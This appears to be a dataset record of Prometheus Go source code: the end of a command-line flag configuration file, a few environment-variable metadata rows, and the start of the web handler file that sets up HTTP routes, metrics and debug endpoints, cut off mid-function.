fs *flag.FlagSet
printVersion bool
configFile string
storage local.MemorySeriesStorageOptions
localStorageEngine string
notifier notifier.Options
notifierTimeout time.Duration
queryEngine promql.EngineOptions
web web.Options
remote remote.Options
alertmanagerURLs stringset
prometheusURL string
influxdbURL string
}{
alertmanagerURLs: stringset{},
}
func init() {
cfg.fs = flag.NewFlagSet(os.Args[0], flag.ContinueOnError)
cfg.fs.Usage = usage
// Set additional defaults.
cfg.storage.SyncStrategy = local.Adaptive
cfg.fs.BoolVar(
&cfg.printVersion, "version", false,
"Print version information.",
)
cfg.fs.StringVar(
&cfg.configFile, "config.file", "prometheus.yml",
"Prometheus configuration file name.",
)
// Web.
cfg.fs.StringVar(
&cfg.web.ListenAddress, "web.listen-address", ":9090",
"Address to listen on for the web interface, API, and telemetry.",
)
cfg.fs.StringVar(
&cfg.prometheusURL, "web.external-url", "",
"The URL under which Prometheus is externally reachable (for example, if Prometheus is served via a reverse proxy). Used for generating relative and absolute links back to Prometheus itself. If the URL has a path portion, it will be used to prefix all HTTP endpoints served by Prometheus. If omitted, relevant URL components will be derived automatically.",
)
cfg.fs.StringVar(
&cfg.web.RoutePrefix, "web.route-prefix", "",
"Prefix for the internal routes of web endpoints. Defaults to path of -web.external-url.",
)
cfg.fs.StringVar(
&cfg.web.MetricsPath, "web.telemetry-path", "/metrics",
"Path under which to expose metrics.",
)
cfg.fs.StringVar(
&cfg.web.UserAssetsPath, "web.user-assets", "",
"Path to static asset directory, available at /user.",
)
cfg.fs.BoolVar(
&cfg.web.EnableQuit, "web.enable-remote-shutdown", false,
"Enable remote service shutdown.",
)
cfg.fs.StringVar(
&cfg.web.ConsoleTemplatesPath, "web.console.templates", "consoles",
"Path to the console template directory, available at /consoles.",
)
cfg.fs.StringVar(
&cfg.web.ConsoleLibrariesPath, "web.console.libraries", "console_libraries",
"Path to the console library directory.",
)
// Storage.
cfg.fs.StringVar(
&cfg.storage.PersistenceStoragePath, "storage.local.path", "data",
"Base path for metrics storage.",
)
cfg.fs.IntVar(
&cfg.storage.MemoryChunks, "storage.local.memory-chunks", 1024*1024,
"How many chunks to keep in memory. While the size of a chunk is 1kiB, the total memory usage will be significantly higher than this value * 1kiB. Furthermore, for various reasons, more chunks might have to be kept in memory temporarily. Sample ingestion will be throttled if the configured value is exceeded by more than 10%.",
)
cfg.fs.DurationVar(
&cfg.storage.PersistenceRetentionPeriod, "storage.local.retention", 15*24*time.Hour,
"How long to retain samples in the local storage.",
)
cfg.fs.IntVar(
&cfg.storage.MaxChunksToPersist, "storage.local.max-chunks-to-persist", 512*1024,
"How many chunks can be waiting for persistence before sample ingestion will be throttled. Many chunks waiting to be persisted will increase the checkpoint size.",
)
cfg.fs.DurationVar(
&cfg.storage.CheckpointInterval, "storage.local.checkpoint-interval", 5*time.Minute,
"The period at which the in-memory metrics and the chunks not yet persisted to series files are checkpointed.",
)
cfg.fs.IntVar(
&cfg.storage.CheckpointDirtySeriesLimit, "storage.local.checkpoint-dirty-series-limit", 5000,
"If approx. that many time series are in a state that would require a recovery operation after a crash, a checkpoint is triggered, even if the checkpoint interval hasn't passed yet. A recovery operation requires a disk seek. The default limit intends to keep the recovery time below 1min even on spinning disks. With SSD, recovery is much faster, so you might want to increase this value in that case to avoid overly frequent checkpoints.",
)
cfg.fs.Var(
&cfg.storage.SyncStrategy, "storage.local.series-sync-strategy",
"When to sync series files after modification. Possible values: 'never', 'always', 'adaptive'. Sync'ing slows down storage performance but reduces the risk of data loss in case of an OS crash. With the 'adaptive' strategy, series files are sync'd for as long as the storage is not too much behind on chunk persistence.",
)
cfg.fs.Float64Var(
&cfg.storage.MinShrinkRatio, "storage.local.series-file-shrink-ratio", 0.1,
"A series file is only truncated (to delete samples that have exceeded the retention period) if it shrinks by at least the provided ratio. This saves I/O operations while causing only a limited storage space overhead. If 0 or smaller, truncation will be performed even for a single dropped chunk, while 1 or larger will effectively prevent any truncation.",
)
cfg.fs.BoolVar(
&cfg.storage.Dirty, "storage.local.dirty", false,
"If set, the local storage layer will perform crash recovery even if the last shutdown appears to be clean.",
)
cfg.fs.BoolVar(
&cfg.storage.PedanticChecks, "storage.local.pedantic-checks", false,
"If set, a crash recovery will perform checks on each series file. This might take a very long time.",
)
cfg.fs.Var(
&chunk.DefaultEncoding, "storage.local.chunk-encoding-version",
"Which chunk encoding version to use for newly created chunks. Currently supported is 0 (delta encoding), 1 (double-delta encoding), and 2 (double-delta encoding with variable bit-width).",
)
// Index cache sizes.
cfg.fs.IntVar(
&index.FingerprintMetricCacheSize, "storage.local.index-cache-size.fingerprint-to-metric", index.FingerprintMetricCacheSize,
"The size in bytes for the fingerprint to metric index cache.",
)
cfg.fs.IntVar(
&index.FingerprintTimeRangeCacheSize, "storage.local.index-cache-size.fingerprint-to-timerange", index.FingerprintTimeRangeCacheSize,
"The size in bytes for the metric time range index cache.",
)
cfg.fs.IntVar(
&index.LabelNameLabelValuesCacheSize, "storage.local.index-cache-size.label-name-to-label-values", index.LabelNameLabelValuesCacheSize,
"The size in bytes for the label name to label values index cache.",
)
cfg.fs.IntVar(
&index.LabelPairFingerprintsCacheSize, "storage.local.index-cache-size.label-pair-to-fingerprints", index.LabelPairFingerprintsCacheSize,
"The size in bytes for the label pair to fingerprints index cache.",
)
cfg.fs.IntVar(
&cfg.storage.NumMutexes, "storage.local.num-fingerprint-mutexes", 4096,
"The number of mutexes used for fingerprint locking.",
)
cfg.fs.StringVar(
&cfg.localStorageEngine, "storage.local.engine", "persisted",
"Local storage engine. Supported values are: 'persisted' (full local storage with on-disk persistence) and 'none' (no local storage).",
)
// Remote storage.
cfg.fs.StringVar(
&cfg.remote.GraphiteAddress, "storage.remote.graphite-address", "",
"The host:port of the remote Graphite server to send samples to. None, if empty.",
)
cfg.fs.StringVar(
&cfg.remote.GraphiteTransport, "storage.remote.graphite-transport", "tcp",
"Transport protocol to use to communicate with Graphite. 'tcp', if empty.",
)
cfg.fs.StringVar(
&cfg.remote.GraphitePrefix, "storage.remote.graphite-prefix", "",
"The prefix to prepend to all metrics exported to Graphite. None, if empty.",
)
cfg.fs.StringVar(
&cfg.remote.OpentsdbURL, "storage.remote.opentsdb-url", "",
"The URL of the remote OpenTSDB server to send samples to. None, if empty.",
)
cfg.fs.StringVar(
&cfg.influxdbURL, "storage.remote.influxdb-url", "",
"The URL of the remote InfluxDB server to send samples to. None, if empty.",
)
cfg.fs.StringVar(
&cfg.remote.InfluxdbRetentionPolicy, "storage.remote.influxdb.retention-policy", "default",
"The InfluxDB retention policy to use.",
)
cfg.fs.StringVar(
&cfg.remote.InfluxdbUsername, "storage.remote.influxdb.username", "",
"The username to use when sending samples to InfluxDB. The corresponding password must be provided via the INFLUXDB_PW environment variable.",
)
cfg.fs.StringVar(
&cfg.remote.InfluxdbDatabase, "storage.remote.influxdb.database", "prometheus",
"The name of the database to use for storing samples in InfluxDB.",
)
cfg.fs.DurationVar(
&cfg.remote.StorageTimeout, "storage.remote.timeout", 30*time.Second,
"The timeout to use when sending samples to the remote storage.",
)
// Alertmanager.
cfg.fs.Var(
&cfg.alertmanagerURLs, "alertmanager.url",
"Comma-separated list of Alertmanager URLs to send notifications to.",
)
cfg.fs.IntVar(
&cfg.notifier.QueueCapacity, "alertmanager.notification-queue-capacity", 10000,
"The capacity of the queue for pending alert manager notifications.",
)
cfg.fs.DurationVar(
&cfg.notifierTimeout, "alertmanager.timeout", 10*time.Second,
"Alert manager HTTP API timeout.",
)
// Query engine.
cfg.fs.DurationVar(
&promql.StalenessDelta, "query.staleness-delta", promql.StalenessDelta,
"Staleness delta allowance during expression evaluations.",
)
cfg.fs.DurationVar(
&cfg.queryEngine.Timeout, "query.timeout", 2*time.Minute,
"Maximum time a query may take before being aborted.",
)
cfg.fs.IntVar(
&cfg.queryEngine.MaxConcurrentQueries, "query.max-concurrency", 20,
"Maximum number of queries executed concurrently.",
)
// Flags from the log package have to be added explicitly to our custom flag set.
log.AddFlags(cfg.fs)
}
func parse(args []string) error {
err := cfg.fs.Parse(args)
if err != nil || len(cfg.fs.Args()) != 0 {
if err != flag.ErrHelp {
log.Errorf("Invalid command line arguments. Help: %s -h", os.Args[0])
}
if err == nil {
err = fmt.Errorf("Non-flag argument on command line: %q", cfg.fs.Args()[0])
}
return err
}
if promql.StalenessDelta < 0 {
return fmt.Errorf("negative staleness delta: %s", promql.StalenessDelta)
}
if err := parsePrometheusURL(); err != nil {
return err
}
// Default -web.route-prefix to path of -web.external-url.
if cfg.web.RoutePrefix == "" {
cfg.web.RoutePrefix = cfg.web.ExternalURL.Path
}
// RoutePrefix must always be at least '/'.
cfg.web.RoutePrefix = "/" + strings.Trim(cfg.web.RoutePrefix, "/")
if err := parseInfluxdbURL(); err != nil {
return err
}
for u := range cfg.alertmanagerURLs {
if err := validateAlertmanagerURL(u); err != nil {
return err
}
}
cfg.remote.InfluxdbPassword = os.Getenv("INFLUXDB_PW")
return nil
}
func parsePrometheusURL() error {
if cfg.prometheusURL == "" {
hostname, err := os.Hostname()
if err != nil {
return err
}
_, port, err := net.SplitHostPort(cfg.web.ListenAddress)
if err != nil {
return err
}
cfg.prometheusURL = fmt.Sprintf("http://%s:%s/", hostname, port)
}
if ok := govalidator.IsURL(cfg.prometheusURL); !ok {
return fmt.Errorf("invalid Prometheus URL: %s", cfg.prometheusURL)
}
promURL, err := url.Parse(cfg.prometheusURL)
if err != nil {
return err
}
cfg.web.ExternalURL = promURL
ppref := strings.TrimRight(cfg.web.ExternalURL.Path, "/")
if ppref != "" && !strings.HasPrefix(ppref, "/") {
ppref = "/" + ppref
}
cfg.web.ExternalURL.Path = ppref
return nil
}
func parseInfluxdbURL() error {
if cfg.influxdbURL == "" {
return nil
}
if ok := govalidator.IsURL(cfg.influxdbURL); !ok {
return fmt.Errorf("invalid InfluxDB URL: %s", cfg.influxdbURL)
}
url, err := url.Parse(cfg.influxdbURL)
if err != nil {
return err
}
cfg.remote.InfluxdbURL = url
return nil
}
func validateAlertmanagerURL(u string) error {
if u == "" {
return nil
}
if ok := govalidator.IsURL(u); !ok {
return fmt.Errorf("invalid Alertmanager URL: %s", u)
}
url, err := url.Parse(u)
if err != nil {
return err
}
if url.Scheme == "" {
return fmt.Errorf("missing scheme in Alertmanager URL: %s", u)
}
return nil
}
var helpTmpl = `
usage: prometheus [<args>]
{{ range $cat, $flags := . }}{{ if ne $cat "." }} == {{ $cat | upper }} =={{ end }}
{{ range $flags }}
-{{ .Name }} {{ .DefValue | quote }}
{{ .Usage | wrap 80 6 }}
{{ end }}
{{ end }}
`
func usage() {
helpTmpl = strings.TrimSpace(helpTmpl)
t := template.New("usage")
t = t.Funcs(template.FuncMap{
"wrap": func(width, indent int, s string) (ns string) {
width = width - indent
length := indent
for _, w := range strings.SplitAfter(s, " ") {
if length+len(w) > width {
ns += "\n" + strings.Repeat(" ", indent)
length = 0
}
ns += w
length += len(w)
}
return strings.TrimSpace(ns)
},
"quote": func(s string) string {
if len(s) == 0 || s == "false" || s == "true" || unicode.IsDigit(rune(s[0])) {
return s
}
return fmt.Sprintf("%q", s)
},
"upper": strings.ToUpper,
})
t = template.Must(t.Parse(helpTmpl))
groups := make(map[string][]*flag.Flag)
// Bucket flags into groups based on the first of their dot-separated levels.
cfg.fs.VisitAll(func(fl *flag.Flag) {
parts := strings.SplitN(fl.Name, ".", 2)
if len(parts) == 1 {
groups["."] = append(groups["."], fl)
} else {
name := parts[0]
groups[name] = append(groups[name], fl)
}
})
for cat, fl := range groups {
if len(fl) < 2 && cat != "." {
groups["."] = append(groups["."], fl...)
delete(groups, cat)
}
}
if err := t.Execute(os.Stdout, groups); err != nil {
panic(fmt.Errorf("error executing usage template: %s", err))
}
}
type stringset map[string]struct{}
func (ss stringset) Set(s string) error {
for _, v := range strings.Split(s, ",") {
v = strings.TrimSpace(v)
if v != "" {
ss[v] = struct{}{}
}
}
return nil
}
func (ss stringset) String() string {
return strings.Join(ss.slice(), ",")
}
func (ss stringset) slice() []string {
slice := make([]string, 0, len(ss))
for k := range ss {
slice = append(slice, k)
}
sort.Strings(slice)
return slice
}
|
[
"\"INFLUXDB_PW\""
] |
[] |
[
"INFLUXDB_PW"
] |
[]
|
["INFLUXDB_PW"]
|
go
| 1 | 0 | |
web/web.go
|
// Copyright 2013 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package web
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
stdlog "log"
"math"
"net"
"net/http"
"net/http/pprof"
"net/url"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"sort"
"strings"
"sync"
template_text "text/template"
"time"
"github.com/alecthomas/units"
"github.com/go-kit/kit/log"
"github.com/go-kit/kit/log/level"
conntrack "github.com/mwitkow/go-conntrack"
"github.com/opentracing-contrib/go-stdlib/nethttp"
opentracing "github.com/opentracing/opentracing-go"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promhttp"
io_prometheus_client "github.com/prometheus/client_model/go"
"github.com/prometheus/common/model"
"github.com/prometheus/common/route"
"github.com/prometheus/common/server"
"github.com/prometheus/exporter-toolkit/https"
"go.uber.org/atomic"
"golang.org/x/net/netutil"
"github.com/prometheus/prometheus/config"
"github.com/prometheus/prometheus/notifier"
"github.com/prometheus/prometheus/promql"
"github.com/prometheus/prometheus/rules"
"github.com/prometheus/prometheus/scrape"
"github.com/prometheus/prometheus/storage"
"github.com/prometheus/prometheus/template"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/index"
"github.com/prometheus/prometheus/util/httputil"
api_v1 "github.com/prometheus/prometheus/web/api/v1"
"github.com/prometheus/prometheus/web/ui"
)
// Paths that are handled by the React / Reach router and should all be served the main React app's index.html.
var reactRouterPaths = []string{
"/alerts",
"/config",
"/flags",
"/graph",
"/rules",
"/service-discovery",
"/status",
"/targets",
"/tsdb-status",
}
// withStackTracer logs the stack trace in case the request panics. The function
// will re-raise the error which will then be handled by the net/http package.
// It is needed because the go-kit log package doesn't manage properly the
// panics from net/http (see https://github.com/go-kit/kit/issues/233).
func withStackTracer(h http.Handler, l log.Logger) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
defer func() {
if err := recover(); err != nil {
const size = 64 << 10
buf := make([]byte, size)
buf = buf[:runtime.Stack(buf, false)]
level.Error(l).Log("msg", "panic while serving request", "client", r.RemoteAddr, "url", r.URL, "err", err, "stack", buf)
panic(err)
}
}()
h.ServeHTTP(w, r)
})
}
type metrics struct {
requestCounter *prometheus.CounterVec
requestDuration *prometheus.HistogramVec
responseSize *prometheus.HistogramVec
}
func newMetrics(r prometheus.Registerer) *metrics {
m := &metrics{
requestCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Name: "prometheus_http_requests_total",
Help: "Counter of HTTP requests.",
},
[]string{"handler", "code"},
),
requestDuration: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_request_duration_seconds",
Help: "Histogram of latencies for HTTP requests.",
Buckets: []float64{.1, .2, .4, 1, 3, 8, 20, 60, 120},
},
[]string{"handler"},
),
responseSize: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_response_size_bytes",
Help: "Histogram of response size for HTTP requests.",
Buckets: prometheus.ExponentialBuckets(100, 10, 8),
},
[]string{"handler"},
),
}
if r != nil {
r.MustRegister(m.requestCounter, m.requestDuration, m.responseSize)
registerFederationMetrics(r)
}
return m
}
func (m *metrics) instrumentHandlerWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return m.instrumentHandler(prefix+handlerName, handler)
}
}
func (m *metrics) instrumentHandler(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return promhttp.InstrumentHandlerCounter(
m.requestCounter.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerDuration(
m.requestDuration.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerResponseSize(
m.responseSize.MustCurryWith(prometheus.Labels{"handler": handlerName}),
handler,
),
),
)
}
// PrometheusVersion contains build information about Prometheus.
type PrometheusVersion = api_v1.PrometheusVersion
type LocalStorage interface {
storage.Storage
api_v1.TSDBAdminStats
}
// Handler serves various HTTP endpoints of the Prometheus server
type Handler struct {
logger log.Logger
gatherer prometheus.Gatherer
metrics *metrics
scrapeManager *scrape.Manager
ruleManager *rules.Manager
queryEngine *promql.Engine
lookbackDelta time.Duration
context context.Context
storage storage.Storage
localStorage LocalStorage
notifier *notifier.Manager
apiV1 *api_v1.API
router *route.Router
quitCh chan struct{}
quitOnce sync.Once
reloadCh chan chan error
options *Options
config *config.Config
versionInfo *PrometheusVersion
birth time.Time
cwd string
flagsMap map[string]string
mtx sync.RWMutex
now func() model.Time
ready atomic.Uint32 // ready is uint32 rather than boolean to be able to use atomic functions.
}
// ApplyConfig updates the config field of the Handler struct
func (h *Handler) ApplyConfig(conf *config.Config) error {
h.mtx.Lock()
defer h.mtx.Unlock()
h.config = conf
return nil
}
// Options for the web Handler.
type Options struct {
Context context.Context
TSDBRetentionDuration model.Duration
TSDBDir string
TSDBMaxBytes units.Base2Bytes
LocalStorage LocalStorage
Storage storage.Storage
QueryEngine *promql.Engine
LookbackDelta time.Duration
ScrapeManager *scrape.Manager
RuleManager *rules.Manager
Notifier *notifier.Manager
Version *PrometheusVersion
Flags map[string]string
ListenAddress string
CORSOrigin *regexp.Regexp
ReadTimeout time.Duration
MaxConnections int
ExternalURL *url.URL
RoutePrefix string
UseLocalAssets bool
UserAssetsPath string
ConsoleTemplatesPath string
ConsoleLibrariesPath string
EnableLifecycle bool
EnableAdminAPI bool
PageTitle string
RemoteReadSampleLimit int
RemoteReadConcurrencyLimit int
RemoteReadBytesInFrame int
Gatherer prometheus.Gatherer
Registerer prometheus.Registerer
}
// New initializes a new web Handler.
func New(logger log.Logger, o *Options) *Handler {
if logger == nil {
logger = log.NewNopLogger()
}
m := newMetrics(o.Registerer)
router := route.New().
WithInstrumentation(m.instrumentHandler).
WithInstrumentation(setPathWithPrefix(""))
cwd, err := os.Getwd()
if err != nil {
cwd = "<error retrieving current working directory>"
}
h := &Handler{
logger: logger,
gatherer: o.Gatherer,
metrics: m,
router: router,
quitCh: make(chan struct{}),
reloadCh: make(chan chan error),
options: o,
versionInfo: o.Version,
birth: time.Now().UTC(),
cwd: cwd,
flagsMap: o.Flags,
context: o.Context,
scrapeManager: o.ScrapeManager,
ruleManager: o.RuleManager,
queryEngine: o.QueryEngine,
lookbackDelta: o.LookbackDelta,
storage: o.Storage,
localStorage: o.LocalStorage,
notifier: o.Notifier,
now: model.Now,
}
h.ready.Store(0)
factoryTr := func(_ context.Context) api_v1.TargetRetriever { return h.scrapeManager }
factoryAr := func(_ context.Context) api_v1.AlertmanagerRetriever { return h.notifier }
FactoryRr := func(_ context.Context) api_v1.RulesRetriever { return h.ruleManager }
h.apiV1 = api_v1.NewAPI(h.queryEngine, h.storage, factoryTr, factoryAr,
func() config.Config {
h.mtx.RLock()
defer h.mtx.RUnlock()
return *h.config
},
o.Flags,
api_v1.GlobalURLOptions{
ListenAddress: o.ListenAddress,
Host: o.ExternalURL.Host,
Scheme: o.ExternalURL.Scheme,
},
h.testReady,
h.options.LocalStorage,
h.options.TSDBDir,
h.options.EnableAdminAPI,
logger,
FactoryRr,
h.options.RemoteReadSampleLimit,
h.options.RemoteReadConcurrencyLimit,
h.options.RemoteReadBytesInFrame,
h.options.CORSOrigin,
h.runtimeInfo,
h.versionInfo,
o.Gatherer,
)
if o.RoutePrefix != "/" {
// If the prefix is missing for the root path, prepend it.
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, o.RoutePrefix, http.StatusFound)
})
router = router.WithPrefix(o.RoutePrefix)
}
readyf := h.testReady
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "/graph"), http.StatusFound)
})
router.Get("/classic/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "/classic/graph"), http.StatusFound)
})
// Redirect the original React UI's path (under "/new") to its new path at the root.
router.Get("/new/*path", func(w http.ResponseWriter, r *http.Request) {
p := route.Param(r.Context(), "path")
http.Redirect(w, r, path.Join(o.ExternalURL.Path, strings.TrimPrefix(p, "/new"))+"?"+r.URL.RawQuery, http.StatusFound)
})
router.Get("/classic/alerts", readyf(h.alerts))
router.Get("/classic/graph", readyf(h.graph))
router.Get("/classic/status", readyf(h.status))
router.Get("/classic/flags", readyf(h.flags))
router.Get("/classic/config", readyf(h.serveConfig))
router.Get("/classic/rules", readyf(h.rules))
router.Get("/classic/targets", readyf(h.targets))
router.Get("/classic/service-discovery", readyf(h.serviceDiscovery))
router.Get("/classic/static/*filepath", func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = path.Join("/static", route.Param(r.Context(), "filepath"))
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
// Make sure that "<path-prefix>/classic" is redirected to "<path-prefix>/classic/" and
// not just the naked "/classic/", which would be the default behavior of the router
// with the "RedirectTrailingSlash" option (https://godoc.org/github.com/julienschmidt/httprouter#Router.RedirectTrailingSlash),
// and which breaks users with a --web.route-prefix that deviates from the path derived
// from the external URL.
// See https://github.com/prometheus/prometheus/issues/6163#issuecomment-553855129.
router.Get("/classic", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "classic")+"/", http.StatusFound)
})
router.Get("/version", h.version)
router.Get("/metrics", promhttp.Handler().ServeHTTP)
router.Get("/federate", readyf(httputil.CompressionHandler{
Handler: http.HandlerFunc(h.federation),
}.ServeHTTP))
router.Get("/consoles/*filepath", readyf(h.consoles))
serveReactApp := func(w http.ResponseWriter, r *http.Request) {
f, err := ui.Assets.Open("/static/react/index.html")
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error opening React index.html: %v", err)
return
}
idx, err := ioutil.ReadAll(f)
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error reading React index.html: %v", err)
return
}
replacedIdx := bytes.ReplaceAll(idx, []byte("CONSOLES_LINK_PLACEHOLDER"), []byte(h.consolesPath()))
replacedIdx = bytes.ReplaceAll(replacedIdx, []byte("TITLE_PLACEHOLDER"), []byte(h.options.PageTitle))
w.Write(replacedIdx)
}
// Serve the React app.
for _, p := range reactRouterPaths {
router.Get(p, serveReactApp)
}
// The favicon and manifest are bundled as part of the React app, but we want to serve
// them on the root.
for _, p := range []string{"/favicon.ico", "/manifest.json"} {
assetPath := "/static/react" + p
router.Get(p, func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = assetPath
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
}
// Static files required by the React app.
router.Get("/static/*filepath", func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = path.Join("/static/react/static", route.Param(r.Context(), "filepath"))
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
if o.UserAssetsPath != "" {
router.Get("/user/*filepath", route.FileServe(o.UserAssetsPath))
}
if o.EnableLifecycle {
router.Post("/-/quit", h.quit)
router.Put("/-/quit", h.quit)
router.Post("/-/reload", h.reload)
router.Put("/-/reload", h.reload)
} else {
forbiddenAPINotEnabled := func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusForbidden)
w.Write([]byte("Lifecycle API is not enabled."))
}
router.Post("/-/quit", forbiddenAPINotEnabled)
router.Put("/-/quit", forbiddenAPINotEnabled)
router.Post("/-/reload", forbiddenAPINotEnabled)
router.Put("/-/reload", forbiddenAPINotEnabled)
}
router.Get("/-/quit", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/-/reload", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/debug/*subpath", serveDebug)
router.Post("/debug/*subpath", serveDebug)
router.Get("/-/healthy", func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Healthy.\n")
})
router.Get("/-/ready", readyf(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Ready.\n")
}))
return h
}
func serveDebug(w http.ResponseWriter, req *http.Request) {
ctx := req.Context()
subpath := route.Param(ctx, "subpath")
if subpath == "/pprof" {
http.Redirect(w, req, req.URL.Path+"/", http.StatusMovedPermanently)
return
}
if !strings.HasPrefix(subpath, "/pprof/") {
http.NotFound(w, req)
return
}
subpath = strings.TrimPrefix(subpath, "/pprof/")
switch subpath {
case "cmdline":
pprof.Cmdline(w, req)
case "profile":
pprof.Profile(w, req)
case "symbol":
pprof.Symbol(w, req)
case "trace":
pprof.Trace(w, req)
default:
req.URL.Path = "/debug/pprof/" + subpath
pprof.Index(w, req)
}
}
// Ready sets Handler to be ready.
func (h *Handler) Ready() {
h.ready.Store(1)
}
// isReady verifies whether the server is ready.
func (h *Handler) isReady() bool {
return h.ready.Load() > 0
}
// testReady checks whether the server is ready; if so it calls f, otherwise it responds with 503 Service Unavailable.
func (h *Handler) testReady(f http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
if h.isReady() {
f(w, r)
} else {
w.WriteHeader(http.StatusServiceUnavailable)
fmt.Fprintf(w, "Service Unavailable")
}
}
}
// Quit returns the receive-only quit channel.
func (h *Handler) Quit() <-chan struct{} {
return h.quitCh
}
// Reload returns the receive-only channel that signals configuration reload requests.
func (h *Handler) Reload() <-chan chan error {
return h.reloadCh
}
// Listener creates the TCP listener for web requests.
func (h *Handler) Listener() (net.Listener, error) {
level.Info(h.logger).Log("msg", "Start listening for connections", "address", h.options.ListenAddress)
listener, err := net.Listen("tcp", h.options.ListenAddress)
if err != nil {
return listener, err
}
listener = netutil.LimitListener(listener, h.options.MaxConnections)
// Monitor incoming connections with conntrack.
listener = conntrack.NewListener(listener,
conntrack.TrackWithName("http"),
conntrack.TrackWithTracing())
return listener, nil
}
// Run serves the HTTP endpoints.
func (h *Handler) Run(ctx context.Context, listener net.Listener, httpsConfig string) error {
if listener == nil {
var err error
listener, err = h.Listener()
if err != nil {
return err
}
}
operationName := nethttp.OperationNameFunc(func(r *http.Request) string {
return fmt.Sprintf("%s %s", r.Method, r.URL.Path)
})
mux := http.NewServeMux()
mux.Handle("/", h.router)
apiPath := "/api"
if h.options.RoutePrefix != "/" {
apiPath = h.options.RoutePrefix + apiPath
level.Info(h.logger).Log("msg", "Router prefix", "prefix", h.options.RoutePrefix)
}
av1 := route.New().
WithInstrumentation(h.metrics.instrumentHandlerWithPrefix("/api/v1")).
WithInstrumentation(setPathWithPrefix(apiPath + "/v1"))
h.apiV1.Register(av1)
mux.Handle(apiPath+"/v1/", http.StripPrefix(apiPath+"/v1", av1))
errlog := stdlog.New(log.NewStdlibAdapter(level.Error(h.logger)), "", 0)
httpSrv := &http.Server{
Handler: withStackTracer(nethttp.Middleware(opentracing.GlobalTracer(), mux, operationName), h.logger),
ErrorLog: errlog,
ReadTimeout: h.options.ReadTimeout,
}
errCh := make(chan error)
go func() {
errCh <- https.Serve(listener, httpSrv, httpsConfig, h.logger)
}()
select {
case e := <-errCh:
return e
case <-ctx.Done():
httpSrv.Shutdown(ctx)
return nil
}
}
func (h *Handler) alerts(w http.ResponseWriter, r *http.Request) {
var groups []*rules.Group
for _, group := range h.ruleManager.RuleGroups() {
if group.HasAlertingRules() {
groups = append(groups, group)
}
}
alertStatus := AlertStatus{
Groups: groups,
AlertStateToRowClass: map[rules.AlertState]string{
rules.StateInactive: "success",
rules.StatePending: "warning",
rules.StateFiring: "danger",
},
Counts: alertCounts(groups),
}
h.executeTemplate(w, "alerts.html", alertStatus)
}
func alertCounts(groups []*rules.Group) AlertByStateCount {
result := AlertByStateCount{}
for _, group := range groups {
for _, alert := range group.AlertingRules() {
switch alert.State() {
case rules.StateInactive:
result.Inactive++
case rules.StatePending:
result.Pending++
case rules.StateFiring:
result.Firing++
}
}
}
return result
}
func (h *Handler) consoles(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
name := route.Param(ctx, "filepath")
file, err := http.Dir(h.options.ConsoleTemplatesPath).Open(name)
if err != nil {
http.Error(w, err.Error(), http.StatusNotFound)
return
}
defer file.Close()
text, err := ioutil.ReadAll(file)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
ctx = httputil.ContextFromRequest(ctx, r)
// Provide URL parameters as a map for easy use. Advanced users may have need for
// parameters beyond the first, so provide RawParams.
rawParams, err := url.ParseQuery(r.URL.RawQuery)
if err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
params := map[string]string{}
for k, v := range rawParams {
params[k] = v[0]
}
externalLabels := map[string]string{}
h.mtx.RLock()
els := h.config.GlobalConfig.ExternalLabels
h.mtx.RUnlock()
for _, el := range els {
externalLabels[el.Name] = el.Value
}
// Inject some convenience variables that are easier to remember for users
// who are not used to Go's templating system.
defs := []string{
"{{$rawParams := .RawParams }}",
